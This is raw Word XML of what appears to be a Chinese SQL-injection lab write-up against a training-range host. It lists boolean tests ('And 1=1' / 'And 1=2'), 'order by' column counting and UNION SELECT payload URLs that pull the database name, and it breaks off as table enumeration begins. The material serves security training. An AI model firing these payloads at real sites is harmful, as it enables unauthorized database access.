              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="00AE5C28">
              <w:rPr>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Xor</w:t>
            </w:r>
            <w:r w:rsidR="00AE5C28" w:rsidRPr="00AE5C28">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidR="00AE5C28">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>、Like测试、符号测试</w:t>
            </w:r>
            <w:r w:rsidR="00F14825">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>。这里采用经典的</w:t>
            </w:r>
            <w:r w:rsidR="008E3993">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>And</w:t>
            </w:r>
            <w:r w:rsidR="009222AB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidR="008E3993">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r w:rsidR="004D343F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>可以根据</w:t>
            </w:r>
            <w:r w:rsidR="001107FB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>下列结果判断</w:t>
            </w:r>
            <w:r w:rsidR="00A32864">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>漏洞类型。</w:t>
            </w:r>
            <w:r w:rsidR="005B48DA" w:rsidRPr="005B48DA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>由第六部分结果可知存在数字类漏洞。</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="4-1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552"/>
              <w:gridCol w:w="2552"/>
              <w:gridCol w:w="2552"/>
            </w:tblGrid>
            <w:tr w:rsidR="001053E8" w14:paraId="2C625030" w14:textId="77777777" w:rsidTr="009710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52" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="01910EE2" w14:textId="7B3AE9D9" w:rsidR="001053E8" w:rsidRDefault="003A6FAF" w:rsidP="009B2BCB">
                  <w:pPr>
                    <w:pStyle w:val="a7"/>
                    <w:ind w:firstLineChars="0" w:firstLine="0"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>注入漏洞</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="34F4A04F" w14:textId="5B73B2D0" w:rsidR="001053E8" w:rsidRDefault="001053E8" w:rsidP="009B2BCB">
                  <w:pPr>
                    <w:pStyle w:val="a7"/>
                    <w:ind w:firstLineChars="0" w:firstLine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bCs/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>数字类</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="27B6D6FC" w14:textId="60393DC6" w:rsidR="001053E8" w:rsidRDefault="002B57C3" w:rsidP="009B2BCB">
                  <w:pPr>
                    <w:pStyle w:val="a7"/>
                    <w:ind w:firstLineChars="0" w:firstLine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bCs/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>字符类</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="001053E8" w14:paraId="765689EB" w14:textId="77777777" w:rsidTr="009710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52" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="52AAF9F8" w14:textId="3A97B194" w:rsidR="001053E8" w:rsidRDefault="00A52AE8" w:rsidP="009B2BCB">
                  <w:pPr>
                    <w:pStyle w:val="a7"/>
                    <w:ind w:firstLineChars="0" w:firstLine="0"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>And 1=1</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="04448DF4" w14:textId="563FA3E2" w:rsidR="001053E8" w:rsidRDefault="006B0806" w:rsidP="009B2BCB">
                  <w:pPr>
                    <w:pStyle w:val="a7"/>
                    <w:ind w:firstLineChars="0" w:firstLine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bCs w:val="0"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs w:val="0"/>
                    </w:rPr>
                    <w:t>正常</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="5506862F" w14:textId="193E994B" w:rsidR="001053E8" w:rsidRDefault="00797B47" w:rsidP="009B2BCB">
                  <w:pPr>
                    <w:pStyle w:val="a7"/>
                    <w:ind w:firstLineChars="0" w:firstLine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bCs w:val="0"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs w:val="0"/>
                    </w:rPr>
                    <w:t>异常</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="001053E8" w14:paraId="1589251D" w14:textId="77777777" w:rsidTr="009710D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52" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="70F5FC32" w14:textId="61ABDF5C" w:rsidR="001053E8" w:rsidRDefault="00A52AE8" w:rsidP="009B2BCB">
                  <w:pPr>
                    <w:pStyle w:val="a7"/>
                    <w:ind w:firstLineChars="0" w:firstLine="0"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:bCs/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t>And 1=2</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="27D905DF" w14:textId="5B547930" w:rsidR="001053E8" w:rsidRDefault="006B0806" w:rsidP="009B2BCB">
                  <w:pPr>
                    <w:pStyle w:val="a7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bCs w:val="0"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs w:val="0"/>
                    </w:rPr>
                    <w:t>异常</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="4BC311A8" w14:textId="02D50E70" w:rsidR="001053E8" w:rsidRDefault="00797B47" w:rsidP="009B2BCB">
                  <w:pPr>
                    <w:pStyle w:val="a7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bCs w:val="0"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00797B47">
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs w:val="0"/>
                    </w:rPr>
                    <w:t>异常</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="001053E8" w14:paraId="22D0A511" w14:textId="77777777" w:rsidTr="009710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52" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="49617D29" w14:textId="3882996A" w:rsidR="001053E8" w:rsidRDefault="00797B47" w:rsidP="009B2BCB">
                  <w:pPr>
                    <w:pStyle w:val="a7"/>
                    <w:ind w:firstLineChars="0" w:firstLine="0"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>’</w:t>
                  </w:r>
                  <w:r w:rsidR="00A52AE8">
                    <w:rPr>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>And ‘1’=’1</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="3C0B6D81" w14:textId="626831AC" w:rsidR="001053E8" w:rsidRDefault="006B0806" w:rsidP="009B2BCB">
                  <w:pPr>
                    <w:pStyle w:val="a7"/>
                    <w:ind w:firstLineChars="0" w:firstLine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bCs w:val="0"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006B0806">
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs w:val="0"/>
                    </w:rPr>
                    <w:t>异常</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1D74BF03" w14:textId="315E0376" w:rsidR="001053E8" w:rsidRDefault="00797B47" w:rsidP="009B2BCB">
                  <w:pPr>
                    <w:pStyle w:val="a7"/>
                    <w:ind w:firstLineChars="0" w:firstLine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bCs w:val="0"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs w:val="0"/>
                    </w:rPr>
                    <w:t>正常</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="001053E8" w14:paraId="0722B580" w14:textId="77777777" w:rsidTr="009710D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52" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="395941E3" w14:textId="5C3B9623" w:rsidR="001053E8" w:rsidRDefault="00797B47" w:rsidP="009B2BCB">
                  <w:pPr>
                    <w:pStyle w:val="a7"/>
                    <w:ind w:firstLineChars="0" w:firstLine="0"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>’</w:t>
                  </w:r>
                  <w:r w:rsidR="00A52AE8">
                    <w:rPr>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>And ‘1’=’2</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="30416A99" w14:textId="46CA65C3" w:rsidR="001053E8" w:rsidRDefault="006B0806" w:rsidP="009B2BCB">
                  <w:pPr>
                    <w:pStyle w:val="a7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bCs w:val="0"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006B0806">
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs w:val="0"/>
                    </w:rPr>
                    <w:t>异常</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2552" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="58A32DD9" w14:textId="0B66EF9E" w:rsidR="001053E8" w:rsidRDefault="00797B47" w:rsidP="009B2BCB">
                  <w:pPr>
                    <w:pStyle w:val="a7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bCs w:val="0"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00797B47">
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                      <w:bCs w:val="0"/>
                    </w:rPr>
                    <w:t>异常</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="7452355B" w14:textId="19E4BA72" w:rsidR="0067062A" w:rsidRDefault="0067062A" w:rsidP="00C55295">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="423A47D7" w14:textId="08D0C9E5" w:rsidR="00E71C40" w:rsidRPr="00C55295" w:rsidRDefault="005A0201" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C55295">
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00E71C40" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="005679BD" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>分析</w:t>
            </w:r>
            <w:r w:rsidR="00D72EC9" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>选择</w:t>
            </w:r>
            <w:r w:rsidR="0085051D" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>列个数</w:t>
            </w:r>
            <w:r w:rsidR="00F25966" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidR="00DD4B6A" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>显示值</w:t>
            </w:r>
            <w:r w:rsidR="003B359B" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>位置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="631221D8" w14:textId="5F2F123F" w:rsidR="006C606A" w:rsidRPr="006C606A" w:rsidRDefault="00352E69" w:rsidP="006C606A">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>url</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>后面添加</w:t>
            </w:r>
            <w:r w:rsidR="006C606A" w:rsidRPr="006C606A">
              <w:t>order by 1, order by 2, order by 3</w:t>
            </w:r>
            <w:r w:rsidR="006C606A" w:rsidRPr="006C606A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="00A562A4">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>一次递增，</w:t>
            </w:r>
            <w:r w:rsidR="007036F2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>最后一个能够正常显示的数字，对应</w:t>
            </w:r>
            <w:r w:rsidR="00EF0A79">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SQL语句中选择的</w:t>
            </w:r>
            <w:r w:rsidR="006C606A" w:rsidRPr="006C606A">
              <w:t>列</w:t>
            </w:r>
            <w:r w:rsidR="00EF0A79">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数。</w:t>
            </w:r>
            <w:r w:rsidR="005B48DA" w:rsidRPr="005B48DA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>由第六部分结果可知</w:t>
            </w:r>
            <w:r w:rsidR="00B94859" w:rsidRPr="00B94859">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>选择的列数为2</w:t>
            </w:r>
            <w:r w:rsidR="00E93D6C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7833F65D" w14:textId="72AA1060" w:rsidR="001D7E88" w:rsidRDefault="002411E7" w:rsidP="005B48DA">
            <w:pPr>
              <w:pStyle w:val="a7"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>利用Union思想，</w:t>
            </w:r>
            <w:r w:rsidR="00E97C1C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在原始结果后面添加</w:t>
            </w:r>
            <w:r w:rsidR="001A0762">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>一行其他</w:t>
            </w:r>
            <w:r w:rsidR="00E97C1C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果</w:t>
            </w:r>
            <w:r w:rsidR="00475417">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r w:rsidR="00F20B6A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设计以下u</w:t>
            </w:r>
            <w:r w:rsidR="00F20B6A">
              <w:t>rl</w:t>
            </w:r>
            <w:r w:rsidR="00F20B6A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，判断</w:t>
            </w:r>
            <w:r w:rsidR="000B6946">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>显示值所在位置：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C6B97C4" w14:textId="77777777" w:rsidR="00DE3ECC" w:rsidRPr="00DE3ECC" w:rsidRDefault="000B6946" w:rsidP="00063492">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
            <w:r w:rsidRPr="000B6946">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00DE3ECC" w:rsidRPr="00DE3ECC">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
              </w:rPr>
              <w:t>第一行为真，第二行为真</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01431CE7" w14:textId="16A9F028" w:rsidR="000B6946" w:rsidRDefault="000B6946" w:rsidP="000B6946">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="000B6946">
              <w:t>http://rhiq8003.ia.aqlab.cn/?id=1 and 1=</w:t>
            </w:r>
            <w:r w:rsidR="006B4277">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="000B6946">
              <w:t xml:space="preserve"> union select 1,database()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73B7E0D3" w14:textId="275ECE8A" w:rsidR="00063492" w:rsidRPr="00063492" w:rsidRDefault="007C3B56" w:rsidP="00063492">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
            <w:r w:rsidR="00063492" w:rsidRPr="00063492">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00063492" w:rsidRPr="00063492">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>第一行为</w:t>
            </w:r>
            <w:r w:rsidR="00063492">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>假</w:t>
            </w:r>
            <w:r w:rsidR="00063492" w:rsidRPr="00063492">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，第二行为真</w:t>
            </w:r>
            <w:r w:rsidR="00063492">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，指定第一列</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="771499E2" w14:textId="142B0695" w:rsidR="007C3B56" w:rsidRDefault="0031524E" w:rsidP="000B6946">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0031524E">
              <w:t>http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,database()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EF22376" w14:textId="1CFD9847" w:rsidR="00063492" w:rsidRPr="00063492" w:rsidRDefault="00063492" w:rsidP="000B6946">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00063492">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00063492">
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00063492">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> 第一行为假，第二行为真，指定第</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>二</w:t>
            </w:r>
            <w:r w:rsidRPr="00063492">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>列</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A85E3EF" w14:textId="791AA501" w:rsidR="0096699A" w:rsidRDefault="00480B5D" w:rsidP="000B6946">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00480B5D">
              <w:t>http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select database()</w:t>
            </w:r>
            <w:r w:rsidR="00063492">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="00063492">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0193C6D5" w14:textId="5C0571C6" w:rsidR="00DE3A2D" w:rsidRPr="006C606A" w:rsidRDefault="006A25E3" w:rsidP="00275C73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由第六部分结果</w:t>
            </w:r>
            <w:r w:rsidR="00A0677B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可知，</w:t>
            </w:r>
            <w:r w:rsidR="000E456D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>显示的位置为第</w:t>
            </w:r>
            <w:r w:rsidR="007563FE">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="007563FE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>行第2列</w:t>
            </w:r>
            <w:r w:rsidR="005B48DA" w:rsidRPr="005B48DA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69D1899F" w14:textId="51A848B6" w:rsidR="003B359B" w:rsidRPr="00C55295" w:rsidRDefault="005A0201" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C55295">
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003B359B" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>、获取数据库名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="163B53C0" w14:textId="77777777" w:rsidR="00213369" w:rsidRDefault="00934268" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>利用d</w:t>
            </w:r>
            <w:r>
              <w:t>atabase()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>函数，即</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FFA4C01" w14:textId="1914A496" w:rsidR="00C55295" w:rsidRDefault="00934268" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00934268">
              <w:t xml:space="preserve">http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select </w:t>
            </w:r>
            <w:r w:rsidR="00213369">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00213369">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00934268">
              <w:t>database()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47FADCF1" w14:textId="5C38534B" w:rsidR="001A3E32" w:rsidRDefault="001A3E32" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="59122AEE" w14:textId="00428CB2" w:rsidR="003B359B" w:rsidRPr="00C55295" w:rsidRDefault="005A0201" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C55295">
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003B359B" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="002F1323" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>获取</w:t>
            </w:r>
            <w:r w:rsidR="00B30AAF" w:rsidRPr="00C55295">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>数据库中的所有表的名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD8A3B1" w14:textId="3AF1A808" w:rsidR="00391550" w:rsidRDefault="00D67021" w:rsidP="001066F5">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>利用</w:t>
